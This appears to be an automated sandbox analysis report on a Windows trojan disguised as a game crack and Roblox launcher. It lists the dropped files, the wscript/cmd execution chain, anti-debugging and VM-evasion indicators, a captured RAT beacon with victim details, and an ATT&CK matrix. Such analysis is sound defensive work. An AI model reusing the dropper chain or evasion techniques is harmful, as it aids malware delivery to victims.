            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597156s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -597053s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596926s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596799s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596687s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596577s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596466s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596354s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596242s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596130s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -596003s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -595344s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -595207s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -595094s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594983s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594871s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594755s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594632s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594452s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594315s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594203s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -594091s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -593979s >= -30000s
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe TID: 7800Thread sleep time: -593867s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Browserfont\refdhcp.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_00B4A5F4
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_00B5B8E0
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5DD72 VirtualQuery,GetSystemInfo,5_2_00B5DD72
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\AppData
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\AppData\Local
            Source: refdhcp.exe, 00000009.00000002.1930450327.000000001BD0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
            Source: wscript.exe, 00000006.00000003.1840841541.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdB
            Source: RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.000000000157D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.000000000157D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994811368.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000006.00000003.1840841541.0000000002F6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: RDMwYUvZPK.exe, 00000028.00000002.4189749807.0000000001066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\RFAwChXSve.exeAPI call chain: ExitProcess graph end nodegraph_0-13
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeAPI call chain: ExitProcess graph end nodegraph_2-13
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeAPI call chain: ExitProcess graph end nodegraph_5-24484
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeSystem information queried: ModuleInformation
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeProcess information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeHandle closed: DEADC0DE
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeProcess queried: DebugObjectHandle
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_009FB593 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009FB593
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_008A9D50 LoadLibraryW,GetProcAddress,3_2_008A9D50
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_00A1CCB1 mov eax, dword ptr fs:[00000030h]1_2_00A1CCB1
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_00A140EC mov ecx, dword ptr fs:[00000030h]1_2_00A140EC
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_00A1CCF5 mov eax, dword ptr fs:[00000030h]1_2_00A1CCF5
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A1CCB1 mov eax, dword ptr fs:[00000030h]3_2_00A1CCB1
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A140EC mov ecx, dword ptr fs:[00000030h]3_2_00A140EC
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_00A1CCF5 mov eax, dword ptr fs:[00000030h]3_2_00A1CCF5
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B6753D mov eax, dword ptr fs:[00000030h]5_2_00B6753D
            Source: C:\Users\user\Desktop\RFAwChXSve.exeCode function: 0_2_00401AD8 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,CreateWindowExA,0_2_00401AD8
            Source: C:\Browserfont\refdhcp.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_009FB593 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_009FB593
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 1_2_009E160B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_009E160B
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_009FB593 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_009FB593
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeCode function: 3_2_009E160B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_009E160B
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5F063 SetUnhandledExceptionFilter,5_2_00B5F063
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00B5F22B
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B6866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B6866F
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B5EF05
            Source: C:\Browserfont\refdhcp.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeNtProtectVirtualMemory: Indirect: 0x14082C229
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe"
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe"
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\user\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\user\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe"
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe"
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Browserfont\refdhcp.exe "C:\Browserfont\refdhcp.exe"
            Source: C:\Browserfont\refdhcp.exeProcess created: unknown unknown
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe c:\users\user\appdata\local\temp\robloxplayerlauncher.exe --crashpad --no-rate-limit --database=c:\users\user\appdata\local\temp\crashpad_roblox --metrics-dir=c:\users\user\appdata\local\temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=robloxchannel=production --annotation=robloxgithash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=uploadattachmentkilobytelimit=100 --annotation=uploadpercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"124406","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: rica/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"124406","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager`
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
            Source: RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"124406","UserName":"user","IpInfo":{"ip":"8.46.123.175","city":"New York","region":"New York","country":"US","loc":"40.7123,-74.0068","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sle
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe Code function: 5_2_00B5ED5B cpuid 5_2_00B5ED5B
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe Code function: GetLocaleInfoW,GetNumberFormatW,5_2_00B5A63C
            Source: C:\Browserfont\refdhcp.exe Queries volume information: C:\Browserfont\refdhcp.exe VolumeInformation
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe Code function: 1_2_009E1C85 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_009E1C85
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe Code function: 5_2_00B4ACF5 GetVersionExW,5_2_00B4ACF5
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: RDMwYUvZPK.exe PID: 5904, type: MEMORYSTR
            Source: Yara match, File source: 00000009.00000002.1917392588.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000026.00000002.2048959997.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1917392588.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: refdhcp.exe PID: 7660, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: RDMwYUvZPK.exe PID: 1068, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: RDMwYUvZPK.exe PID: 5904, type: MEMORYSTR
            Source: Yara match, File source: 00000009.00000002.1917392588.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000026.00000002.2048959997.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000028.00000002.4191108963.0000000002F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1917392588.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: refdhcp.exe PID: 7660, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: RDMwYUvZPK.exe PID: 1068, type: MEMORYSTR
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 12 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 2 Input Capture | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Abuse Elevation Control Mechanism | Security Account Manager | 338 System Information Discovery | SMB/Windows Admin Shares | 2 Input Capture | Steganography | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | Login Hook | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Software Packing | LSA Secrets | 631 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Timestomp | Cached Domain Credentials | 241 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 332 Masquerading | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 241 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
            | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
            Behavior Graph ID: 1449910, Sample: RFAwChXSve.exe, Startdate: 31/05/2024, Architecture: WINDOWS, Score: 100

            Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; 13 other signatures

            • RFAwChXSve.exe (started)
              Dropped: C:\Users\user\...\RobloxPlayerLauncher.exe, PE32; C:\Users\...\AkrienPremiumCrackByHurminka.exe, PE32
              Signatures: Creates files with lurking names (e.g. Crack.exe)
              • AkrienPremiumCrackByHurminka.exe (started)
                Dropped: C:\Users\user\...\AkrienPremiumCrack.exe, PE32+; C:\Users\user\AppData\...\AkrienCrack.exe, PE32
                Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Creates files with lurking names (e.g. Crack.exe)
                • AkrienCrack.exe (started)
                  Dropped: C:\Browserfont\refdhcp.exe, PE32; C:\Browserfont\ilq5gxa6sOuB.vbe, data
                  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                  • wscript.exe (started)
                    Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    • cmd.exe (started)
                      • refdhcp.exe (started)
                        Dropped: C:\Windows\en-US\RuntimeBroker.exe, PE32; C:\Windows\...\RDMwYUvZPK.exe, PE32; C:\Users\user\RDMwYUvZPK.exe, PE32; 11 other malicious files
                        Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 4 other signatures
                        • schtasks.exe (started)
                        • schtasks.exe (started)
                        • schtasks.exe (started)
                        • 26 other processes
                      • conhost.exe (started)
                • AkrienPremiumCrack.exe (started)
                  DNS/IP: 104.21.68.54, CLOUDFLARENETUS, United States
                  Signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Tries to evade analysis by execution special instruction (VM detection); Tries to detect debuggers (CloseHandle check); 3 other signatures
              • RobloxPlayerLauncher.exe (started)
                DNS/IP: 128.116.119.3, ROBLOX-PRODUCTIONUS, United States; 13.224.189.122, AMAZON-02US, United States; 23.201.248.158, AKAMAI-ASUS, United States
                Dropped: C:\Users\user\...\RobloxPlayerLauncher.exe, PE32; C:\Users\user\...\RobloxPlayerLauncher[1].exe, PE32
                Signatures: Tries to detect virtualization through RDTSC time measurements
                • RobloxPlayerLauncher.exe (started)
            • RDMwYUvZPK.exe (started)
              DNS/IP: 141.8.194.203, SPRINTHOSTRU, Russian Federation
            • RDMwYUvZPK.exe (started)

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | RFAwChXSve.exe | 84% | ReversingLabs | Win32.Trojan.Generic | |
            | RFAwChXSve.exe | 93% | Virustotal | | Browse |
            | RFAwChXSve.exe | 100% | Avira | TR/ATRAPS.Gen2 | |
            | RFAwChXSve.exe | 100% | Joe Sandbox ML | | |

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | C:\Users\user\AppData\Local\Temp\AkrienCrack.exe | 100% | Avira | VBS/Runner.VPG | |
            | C:\Browserfont\RDMwYUvZPK.exe | 100% | Avira | HEUR/AGEN.1323984 | |
            | C:\Browserfont\ilq5gxa6sOuB.vbe | 100% | Avira | VBS/Runner.VPG | |
